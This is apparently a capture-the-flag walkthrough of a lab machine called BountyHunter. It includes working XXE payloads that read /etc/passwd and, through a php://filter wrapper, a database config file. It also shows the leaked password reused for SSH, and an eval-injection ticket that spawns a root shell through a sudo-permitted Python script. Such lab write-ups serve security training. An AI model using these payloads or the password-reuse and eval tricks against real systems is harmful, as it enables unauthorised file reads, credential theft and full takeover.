# NMAP SCAN
```nmap
PORT   STATE SERVICE VERSION  
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)  
| ssh-hostkey:    
|   3072 d4:4c:f5:79:9a:79:a3:b0:f1:66:25:52:c9:53:1f:e1 (RSA)  
|   256 a2:1e:67:61:8d:2f:7a:37:a7:ba:3b:51:08:e8:89:a6 (ECDSA)  
|_  256 a5:75:16:d9:69:58:50:4a:14:11:7a:42:c1:b6:23:44 (ED25519)  
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))  
|_http-title: Bounty Hunters  
|_http-server-header: Apache/2.4.41 (Ubuntu)  
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

# Web (Port 80)
## Findings
- No robots.txt
- PHP
- Apache 2.4.41
- Found an endpoint under development `/log_submit.php`.
- We can send input.
```http
POST /tracker_diRbPr00f314.php HTTP/1.1
Host: 10.10.11.100
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 223
Origin: http://10.10.11.100
DNT: 1
Connection: close
Referer: http://10.10.11.100/log_submit.php
Sec-GPC: 1

data=PD94bWwgIHZlcnNpb249IjEuMCIgZW5jb2Rpbmc9IklTTy04ODU5LTEiPz4KCQk8YnVncmVwb3J0PgoJCTx0aXRsZT50ZXN0PC90aXRsZT4KCQk8Y3dlPnRlc3Q8L2N3ZT4KCQk8Y3Zzcz50ZXN0PC9jdnNzPgoJCTxyZXdhcmQ%2BdGV0czwvcmV3YXJkPgoJCTwvYnVncmVwb3J0Pg%3D%3D
```
- Data is URL encoded and base64 encoded.
```xml
<?xml  version="1.0" encoding="ISO-8859-1"?>
		<bugreport>
		<title>test</title>
		<cwe>test</cwe>
		<cvss>test</cvss>
		<reward>tets</reward>
		</bugreport>
```
- Possible XXE injection?
- We can try to read /etc/passwd using simple XXE
```xml
<?xml  version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
		<bugreport>
		<title>&xxe;</title>
		<cwe>test</cwe>
		<cvss>test</cvss>
		<reward>tets</reward>
		</bugreport>
```
```txt
%50%44%39%34%62%57%77%67%49%48%5a%6c%63%6e%4e%70%62%32%34%39%49%6a%45%75%4d%43%49%67%5a%57%35%6a%62%32%52%70%62%6d%63%39%49%6b%6c%54%54%79%30%34%4f%44%55%35%4c%54%45%69%50%7a%34%4b%50%43%46%45%54%30%4e%55%57%56%42%46%49%47%5a%76%62%79%42%62%49%44%77%68%52%55%35%55%53%56%52%5a%49%48%68%34%5a%53%42%54%57%56%4e%55%52%55%30%67%49%6d%5a%70%62%47%55%36%4c%79%38%76%5a%58%52%6a%4c%33%42%68%63%33%4e%33%5a%43%49%2b%49%46%30%2b%43%67%6b%4a%50%47%4a%31%5a%33%4a%6c%63%47%39%79%64%44%34%4b%43%51%6b%38%64%47%6c%30%62%47%55%2b%4a%6e%68%34%5a%54%73%38%4c%33%52%70%64%47%78%6c%50%67%6f%4a%43%54%78%6a%64%32%55%2b%64%47%56%7a%64%44%77%76%59%33%64%6c%50%67%6f%4a%43%54%78%6a%64%6e%4e%7a%50%6e%52%6c%63%33%51%38%4c%32%4e%32%63%33%4d%2b%43%67%6b%4a%50%48%4a%6c%64%32%46%79%5a%44%35%30%5a%58%52%7a%50%43%39%79%5a%58%64%68%63%6d%51%2b%43%67%6b%4a%50%43%39%69%64%57%64%79%5a%58%42%76%63%6e%51%2b
```
- We have XXE injection
```bash
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin
tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin
landscape:x:109:115::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:110:1::/var/cache/pollinate:/bin/false
sshd:x:111:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
development:x:1000:1000:Development:/home/development:/bin/bash
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
usbmux:x:112:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
```

# Foothold
- We can use files from our enumeration with feroxbuster to read interesting file such as `db.php
- To do this we need to use a php wrapper
```xml
<?xml  version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE replace [<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=db.php"> ]>
		<bugreport>
		<title>&xxe;</title>
		<cwe>test</cwe>
		<cvss>test</cvss>
		<reward>tets</reward>
		</bugreport>
```

```php
<?php
// TODO -> Implement login system with the database.
$dbserver = "localhost";
$dbname = "bounty";
$dbusername = "admin";
$dbpassword = "m19RoAU0hP41A1sTsq6K";
$testuser = "test";
?>
```
DB Credentials
`admin:m19RoAU0hP41A1sTsq6K`
- Reuse password maybe?
- We have user development
`development:m19RoAU0hP41A1sTsq6K`
- Apparently the password is reused and we're able to login!

# Privilege Escalation
- Check `sudo -l`
```bash
User development may run the following commands on bountyhunter:  
   (root) NOPASSWD: /usr/bin/python3.8 /opt/skytrain_inc/ticketValidator.py
```
- We only have read permission to that file.
```py
#Skytrain Inc Ticket Validation System 0.1  
#Do not distribute this file.  
  
def load_file(loc):  
   if loc.endswith(".md"):  
       return open(loc, 'r')  
   else:  
       print("Wrong file type.")  
       exit()  
  
def evaluate(ticketFile):  
   #Evaluates a ticket to check for ireggularities.  
   code_line = None  
   for i,x in enumerate(ticketFile.readlines()):  
       if i == 0:  
           if not x.startswith("# Skytrain Inc"):  
               return False  
           continue  
       if i == 1:  
           if not x.startswith("## Ticket to "):  
               return False  
           print(f"Destination: {' '.join(x.strip().split(' ')[3:])}")  
           continue  
  
       if x.startswith("__Ticket Code:__"):  
           code_line = i+1  
           continue  
  
       if code_line and i == code_line:  
           if not x.startswith("**"):  
               return False  
           ticketCode = x.replace("**", "").split("+")[0]  
           if int(ticketCode) % 7 == 4:  
               validationNumber = eval(x.replace("**", ""))  
               if validationNumber > 100:  
                   return True  
               else:  
                   return False  
   return False  
  
def main():  
   fileName = input("Please enter the path to the ticket file.\n")  
   ticket = load_file(fileName)  
   #DEBUG print(ticket)  
   result = evaluate(ticket)  
   if (result):  
       print("Valid ticket.")  
   else:  
       print("Invalid ticket.")  
   ticket.close  
  
main()
```
So it's a ticketing app, it checks by validating the lines and words in the files.
We can try to create a malicious one.
```txt
# Skytrain Inc  
## Ticket to    
__Ticket Code:__  
**200+24 == 224 and __import__('os').system('/bin/bash')
```

We are now root.

